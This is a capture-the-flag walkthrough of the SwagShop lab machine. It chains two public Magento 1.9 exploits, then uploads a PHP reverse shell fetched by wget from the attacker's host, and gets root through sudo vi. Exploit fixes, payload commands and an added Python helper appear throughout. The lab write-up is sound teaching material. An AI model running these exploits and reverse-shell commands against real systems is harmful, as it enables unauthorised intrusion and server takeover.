Target IP: 10.10.10.140

Exploitation Summary

Initial Exploitation

  • Vulnerability: Remote code execution via Magento
  • Explanation: This Magento 1.9 install has two chained weaknesses: an unauthenticated exploit that creates an admin account, followed by an authenticated exploit that executes arbitrary commands through the admin panel

Privilege Escalation

  • Vulnerability: vi runnable as root via sudo
  • Explanation: vi can spawn a shell (:sh), so sudo vi yields a root shell

Enumeration

nmap -p- -A -T4 10.10.10.140
nmap
TCP 22: OpenSSH 7.2p2 Ubuntu
TCP 80: Apache 2.4.18

Initial Shell Exploitation

Only ports 22 and 80 are open, so let’s check out the web page.

homepage

Browsing around the website and trying some injections didn’t lead to anything particularly interesting, but the URL looks interesting on the login page.

login page

The URL has path-parameter-like syntax after index.php, so I run gobuster directory searches against both / and /index.php.

gobuster dir -u http://10.10.10.140:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307" -x "txt,html,php"
gobuster on /

A few files and folders are found. Browsing through them, a folder of interest (/var/package/) suggests the Magento version is 1.9.

guess version

Now check the results of gobuster searching on /index.php:

gobuster dir -u http://10.10.10.140:80/index.php -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403"
gobuster on index.php

The results show an interesting path, /index.php/admin. Navigating to it reveals the admin login page.

A few weak password guesses fail. Next, check whether Magento has any known vulnerabilities:

searchsploit RCE

A quick run of the exploit shows a syntax error, caused by comments that are not in a valid format. Remove them all (some at the beginning and some at the end), set the target variable to “http://10.10.10.140”, and run again.

set target
exploit failed

Still not working. Looking at the script, it uses the URL /admin/Cms_Wysiwyg/directive/index/. Navigating to this URL in a browser shows it is not valid.

invalid url

Remember we found the admin login page at /index.php/admin, not /admin. So I change the target to “http://10.10.10.140/index.php” and try again.

exploit worked!

All right! The exploit works now. Let’s log in as admin with the credentials it created: forme:forme

admin logged in

searchsploit also listed another remote code execution vulnerability, one that requires authentication. Now that we have an admin login, we can try that exploit.

error

Checking the script shows that some configuration values need to be modified. Make the changes as follows:

# Config.
username = 'forme'
password = 'forme'
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = b'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml

Now run the exploit. Note: the exploit requires the mechanize module; install it with pip install mechanize.

On closer reading, the script manually adds a new form control for the username field, which is not needed here. So remove the following line:

remove line

Running the script again gives another error:

error 2

This error occurs when the script searches the returned content for the expected information and finds nothing. Let’s modify the script to print the content it received.

web content

Run the script again to see the content:

web content

It shows No Data Found, the same message we see on the admin dashboard. The two seem to be related.

no data found

I play with the dashboard range. Every value results in No Data Found until I try the 2YTD range, which shows a chart instead.

Using this hint, I change the period in the script from 7d to 2y.

use 2y

Run the script again:

working

Finally get the exploit working. Awesome!

IMPORTANT: The exploit requires a valid transaction within the specified time frame. If no transaction is returned, the exploit will fail. If you still see No Data Found with 2YTD, the transaction originally created on the box is too old. You have to create a new one: register a customer account, make a purchase, and then create an invoice for the order in the admin panel.
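The failure above is the script searching the dashboard block’s HTML for the chart and getting nothing back: Magento only renders the chart image when the selected period contains orders, and the script then dies on the empty search result. The following is an added example, not code from this page or from 37811.py. It pulls that search into a function that treats the No Data Found response as a distinct outcome instead of a crash, and tries successively wider dashboard periods (Magento 1.9 accepts the period codes 24h, 7d, 1m, 1y and 2y; 2YTD is the dashboard label for 2y). The HTML fragments and the chart URL are constructed for the example, the fetch callable stands in for whatever authenticated request the exploit already makes, and the img src regex assumes the chart is the only image in the block.

```python
import re
from typing import Callable, Optional, Tuple

# Constructed sample responses for the dashboard "orders" block. Neither is
# captured from the target; they only mimic the two outcomes described above.
NO_DATA_HTML = (
    '<div class="dashboard-diagram-nodata">'
    '<span>No Data Found</span>'
    '</div>'
)
CHART_HTML = (
    '<div class="dashboard-diagram-image">'
    '<img src="http://10.10.10.140/index.php/admin/dashboard/chart/example123/" alt="chart" />'
    '</div>'
)

# Magento 1.9 dashboard period codes, narrowest first. "2YTD" in the UI is the
# label shown for the "2y" code.
PERIODS = ("24h", "7d", "1m", "1y", "2y")

# Assumption: the chart is the only <img> in the returned block.
CHART_SRC_RE = re.compile(r'<img[^>]+\bsrc="([^"]+)"')


def find_chart_src(html: str) -> Optional[str]:
    """Return the chart image URL from a dashboard block, or None.

    None means the block reported no orders ("No Data Found") or contained
    no image at all. Either way there is nothing for the exploit to use, and
    the caller should widen the period instead of calling .group() on a
    failed match.
    """
    if "No Data Found" in html:
        return None
    match = CHART_SRC_RE.search(html)
    return match.group(1) if match else None


def first_period_with_chart(
    fetch: Callable[[str], str],
    periods: Tuple[str, ...] = PERIODS,
) -> Optional[Tuple[str, str]]:
    """Try each period in order; return (period, chart_src) for the first one
    whose block contains a chart.

    fetch(period) must return the HTML of the orders block for that period.
    Returns None when every period is empty, which is the "transaction too
    old, create a new order and invoice it" case from the note above.
    """
    for period in periods:
        src = find_chart_src(fetch(period))
        if src is not None:
            return period, src
    return None


def _fake_fetch(period: str) -> str:
    """Offline stand-in for the HTTP request: only the 2y range has an order."""
    return CHART_HTML if period == "2y" else NO_DATA_HTML


if __name__ == "__main__":
    found = first_period_with_chart(_fake_fetch)
    if found is None:
        print("No Data Found for every period: create a new order and invoice it first")
    else:
        period, src = found
        print(f"period {period} has a chart: {src}")
```

In a real run, fetch would issue the same authenticated request the exploit makes for the orders block, with the period substituted, and the returned period is the one to write into the script in place of 7d.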

I tried some simple reverse shells but none worked, so I decide to upload a PHP reverse shell and then run it. First prepare the shell to connect back to 10.10.14.48:4000:

cat /usr/share/webshells/php/php-reverse-shell.php | sed "s/127.0.0.1/10.10.14.48/g" | sed "s/1234/4000/g" > shell4000.php

Now set up a simple HTTP server (python -m SimpleHTTPServer 80) and a netcat listener on port 4000 (nc -nvlp 4000). Finally run the exploit twice: once to fetch the shell onto the box, once to execute it:

python3 37811.py http://10.10.10.140/index.php/admin "wget http://10.10.14.48/shell4000.php -O /tmp/shell4000.php"
python3 37811.py http://10.10.10.140/index.php/admin "php -f /tmp/shell4000.php"

Initial shell obtained!

user flag
The user flag is at /home/haris/user.txt.

Privilege Escalation

sudo -l
sudo

sudo -l shows we can run vi as root. Inside vi we can spawn a shell with :sh, and since vi itself runs as root, so does the shell. Granting an editor through sudo is effectively granting a shell; sudoedit, or the sudoers NOEXEC tag, is the usual way to allow editing a file without that.

sudo vi /var/www/html/api.php
root shell

Rooted!! Now we can capture the root flag.

Thank you for the box SwagShop, ch4p!
